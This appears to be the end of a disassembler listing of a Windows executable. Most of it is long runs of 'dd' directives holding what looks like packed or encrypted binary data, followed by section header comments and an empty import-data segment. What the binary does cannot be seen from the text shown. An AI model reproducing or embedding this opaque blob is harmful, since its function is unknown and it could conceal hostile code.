dd 46DF484Eh, 0EC40611Ch, 0E765EB9Bh, 8E410F2Dh, 475CF415h
dd 9420A827h, 0C61B345Fh, 0E43C9434h, 0EF9BBFCFh, 0F2296127h
dd 0A01C34D4h, 2DEF73E7h, 0D67DF0A8h, 3BE650B2h, 0EE7C204Eh
dd 90B070B8h, 0C1106298h, 4C71D4F8h, 0C597BDAFh, 0A904D939h
dd 2157280Ch, 0A4CE975Fh, 238F794Bh, 0E7B7D37Bh, 52158B99h
dd 0A00E3EFh, 0E14BF39Bh, 0B211D7A3h, 6367380Bh, 5B2913BBh
dd 538E278Fh, 832BA470h, 372C71DBh, 0A87B23E0h, 0A34BF3D1h
dd 51946F3Fh, 130BB35Ah, 0C36A0C30h, 2CEE271Bh, 0E43C94E2h
dd 0E38BA3E4h, 247C7C3Bh, 45E974CCh, 0A4DB9E09h, 7499D0Ch
dd 0C3E054ACh, 96117F5Eh, 83C54B5h, 5025605h, 334621FAh
dd 0C41F9A51h, 400A9F6Ch, 8582920Fh, 0B3C1A477h, 449F0AD1h
dd 0DA7FCBECh, 84DC548Ch, 2775592Bh, 75274CCh, 0B2371698h
dd 60E0C32Ch, 0C7FC54AEh, 45C57548h, 0F33C94EDh, 84DE2212h
dd 42B97C2Ch, 461BF39Bh, 64BC160Fh, 76CFE87h, 0A4A46066h
dd 759CF54Ch, 8316C284h
dd 0B37164DBh, 757C1400h, 0D491A4ECh, 8EBCD440h, 0BC15B22Ch
dd 0D8546834h, 0C9CB7326h, 0A6D0A39Eh, 0F9CD16BFh, 243CC8FDh
dd 0CAB4D9A7h, 9DBC146Ch, 45CBAE4h, 0F854ACACh, 0CECB7326h
dd 24707D71h, 0AE60BA8Ch, 243CC805h, 0D8F5F944h, 49E14ACh
dd 184D3963h, 0A4F4546Ch, 4D51F44Ch, 0B857116Ch, 58DD344Ch
dd 0F5018B71h, 0C71C34E0h, 78BD146Ch, 2DC934F7h, 0A9FC9480h
dd 0E11CA4A0h, 0E47C88C6h, 443A891h, 0E4B0BF79h, 42D079CCh
dd 38ED9903h, 45CB4CCh, 0ADF0D4ACh, 5875B1CCh, 0FB3E942Ch
dd 3241B705h, 247C14F5h, 0A35003A4h, 17C3CFBh, 29F4B35Bh
dd 2FFC54AEh, 8485EAB9h, 800ABCECh, 8DB33DBh, 247CD627h
dd 0DDCE2947h, 0A23714ACh, 6C2AB718h, 0C36B11DBh, 45D1764Bh
dd 2EBD94ECh, 84DC94B0h, 0D6EA5F4Ch, 0B8C67702h, 0FBCCCE6Fh
dd 0C450E591h, 0A4FC54ACh, 0D19AE93Ch, 24709041h, 7159BF8Ch
dd 377C141Ch, 0D3854B70h, 0F1BC1465h, 0C46CB4A1h, 0F5A107ACh
dd 179E574Ch, 0B5C1CB50h, 84DC74A0h, 338CD42Ch, 0C41C1C50h
dd 4C2F536Ch, 630D2364h, 0A91DFBBh, 0C99CB455h, 56C0A39Eh
dd 0FDC348Ch, 0E4A50681h, 0B4D6FFCCh, 84E0DEEDh, 2FFCB40Ch
dd 0A6EF5C66h, 969F3D5Fh, 11B98FE0h, 0FDC747Ch, 0E48C01A9h
dd 4FF266CCh, 0C93FF838h, 49CC4E9h, 51A3D7ACh, 449CF44Ch
dd 0E5344E67h, 0DBDF3C46h, 0A9F78BB3h, 0C4DCAD52h, 38ED9903h
dd 49CB4CCh, 0A6F054ACh, 969F0C23h, 6D6C7DE8h, 44C5E221h
dd 0C6F5F2Ch, 4953A4CDh, 64FC083Dh, 45CB4CCh, 9C735640h
dd 20105C7Dh, 8F85D37Bh, 0AC0F3788h, 0D5780607h, 380E702h
dd 4071A195h, 575CF420h, 0B3CAB310h, 0CB19865Dh, 0E43C959Eh
dd 98BBC996h, 2A71D4ECh, 0FAC4C625h, 94342640h, 43189C5Bh
dd 2FC613BBh, 8E9F0086h, 0B5C1CBDCh, 84DC74A0h, 0B18CD42Ch
dd 0B7D17A0Dh, 3D5AA1E5h, 895FB4CCh, 0A4BC6449h, 44399BCFh
dd 0CF3C94ECh, 198B5C4Fh, 243CCDBAh, 0C4EEFB45h, 0AA3B146Ch
dd 15E1AB2Ch, 0A4FC9480h, 981CF44Ch, 0CB1466F3h, 3E8B33D5h
dd 0FD1A61A7h, 0C73F740Ch, 0EFD4DFE5h, 89D7C4C6h, 0A4BC4D42h
dd 9794BE55h, 0EC761DEFh, 7EC768Dh, 0AF7C2CCFh, 4056E51h
dd 48E8BC6Ch, 0C65DB40Ch, 67FDADA4h, 73317E7Ch, 7B3C54C0h
dd 44D06511h, 247CD42Ch, 0C72268BCh, 0A4CCC1E9h, 5B5C6A0Ch
dd 64304531h, 469CF44Ch, 825049ECh, 95612BD2h, 247C1400h
dd 191C78CCh, 34719E72h, 5B5CF420h, 64304531h, 445CF44Ch
dd 6E3749ECh, 2E9E3693h, 3BDEAA2Eh, 0CB967DA7h, 6656563Eh
dd 17139642h, 867778DEh, 7C9E83B0h, 0BD92116Fh, 93DC344Ch
dd 43E75CB0h, 1691F39Bh, 3BCD435h, 0C4517881h, 52B113ACh
dd 239CB455h, 24719061h, 3E59C18Ch, 0B17C14F5h, 4055641h
dd 8E0EE56Ch, 0BAD1B30Ch, 0C3FC9475h, 8491ACC1h, 1AF1D3ECh
dd 0E3DC7495h, 0E4B1D0A1h, 129101CCh, 3BCD434h, 0C44506A1h
dd 196BAAACh, 445C29E0h, 0BD92F96Fh, 0C7DC344Ch, 247CD444h
dd 0C5B651CCh, 37F541EDh, 54A4B4CCh, 248115ABh, 0C99CB441h
dd 0ACBFD7ACh, 0C5DB24DBh, 0E49154B1h, 0B409B7CCh, 79BCFE6Ch
dd 0E0DD1AF8h, 35D86090h, 2C3C07A1h, 832BD3B0h, 62743961h
dd 4CEB9337h, 0A34BF37Eh, 51AB028Dh, 0F6500AD4h, 0A4FC39F4h
dd 0E9B4D44Ch, 0F92BD37Bh, 0A820BF95h, 0F23161FCh, 4F1C34D4h
dd 0E5221C9Ch, 0D75EBA16h, 0A4D4AA91h, 0CF9C734Ch, 163C3EB0h
dd 0DC71333Ch, 0A77C1401h, 0E29D7C90h, 0A0EB1398h, 4ADFB7E1h
dd 0BF17FCB0h, 0A3B4731Bh, 52BD37Bh, 8410ECCFh, 75D7D42Ch
dd 0C41CA354h, 64CC3C6Ch, 241EB40Ch, 0A42CCCACh, 47B4F44Ch
dd 0A63C94ECh, 385934B0h, 12B9E010h, 201CEC4Fh, 6494B455h
dd 8F5CB40Ch, 612C3860h, 311D0EC7h, 0E47C88DFh, 0E3816DE4h
dd 28BEF53Bh, 0CB1D7ACCh, 0B8C1166Fh, 0A244F84Dh, 0ECC9B3EBh
dd 44B4F8E6h, 0B4DC9CB0h, 6D07B4B4h, 0B4B4C159h, 0E51A8E3Fh
dd 0B6F441C4h, 0C8418A3Ah, 0FA796C7h, 110B3E77h, 0B46C0977h
dd 0E7B4B434h, 0C3DE9F7Dh, 743977E5h, 0E081BC29h, 9D2D7439h
dd 0C304C39Fh, 0B2D800B5h, 0BAF43F0Ch, 2DC49475h, 909C098Ch
dd 45B3B3B3h, 0B3B38A9Ch, 3F75DFB3h, 35B8D820h, 0BAB8D820h
dd 0E1B4B4A4h, 0B4B4B5B4h, 27h, 56h dup(0)
dd 1280h dup(?)
__u_____ ends
; Section 3. (virtual address 0002F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0002A600
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 42F000h
align 2000h
_idata2 ends
end start